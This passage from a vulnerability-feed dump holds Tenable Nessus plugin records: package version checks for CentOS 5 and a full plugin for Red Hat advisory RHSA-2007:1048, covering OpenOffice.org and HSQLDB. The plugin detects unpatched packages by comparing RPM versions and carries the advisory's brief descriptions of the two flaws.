flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:14", "bulletinFamily": "scanner", "description": "Updated openoffice.org and hsqldb packages that fix security flaws are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nOpenOffice.org is an office productivity suite. HSQLDB is a Java relational database engine used by OpenOffice.org Base.\n\nIt was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa' user. If HSQLDB has been configured as a service, a remote attacker who could connect to the HSQLDB port (tcp 9001) could execute arbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a service by default, and needs manual configuration in order to work as a service.\n\nUsers of OpenOffice.org or HSQLDB should update to these errata packages which contain backported patches to correct these issues.", "modified": "2018-08-13T00:00:00", "id": "REDHAT-RHSA-2007-1048.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63845", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : openoffice.org, hsqldb (RHSA-2007:1048)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1048. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63845);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2003-0845\", \"CVE-2007-4575\");\n script_xref(name:\"RHSA\", value:\"2007:1048\");\n\n script_name(english:\"RHEL 5 : openoffice.org, hsqldb (RHSA-2007:1048)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openoffice.org and hsqldb packages that fix security flaws are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nOpenOffice.org is an office productivity suite. HSQLDB is a Java\nrelational database engine used by OpenOffice.org Base.\n\nIt was discovered that HSQLDB could allow the execution of arbitrary\npublic static Java methods. A carefully crafted odb file opened in\nOpenOffice.org Base could execute arbitrary commands with the\npermissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa'\nuser. If HSQLDB has been configured as a service, a remote attacker\nwho could connect to the HSQLDB port (tcp 9001) could execute\narbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a\nservice by default, and needs manual configuration in order to work as\na service.\n\nUsers of OpenOffice.org or HSQLDB should update to these errata\npackages which contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2003-0845.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-4575.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openoffice.org/security/cves/CVE-2007-4575.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-1048.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-emailmerge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-graphicfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-javafilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-af_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-as_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bg_BG\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ca_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cs_CZ\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cy_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-da_DK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-el_GR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-et_EE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-eu_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fi_FI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gl_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-he_IL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hi_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hr_HR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hu_HU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ja_JP\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-kn_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ko_KR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-lt_LT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ml_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-mr_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ms_MY\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nr_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nso_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-or_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pl_PL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sk_SK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sl_SI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sr_CS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ss_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-st_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ta_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-te_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-th_TH\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tn_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tr_TR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ts_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ur\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ve_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-xh_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zu_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-pyuno\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-testtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-xsltfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/10/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif 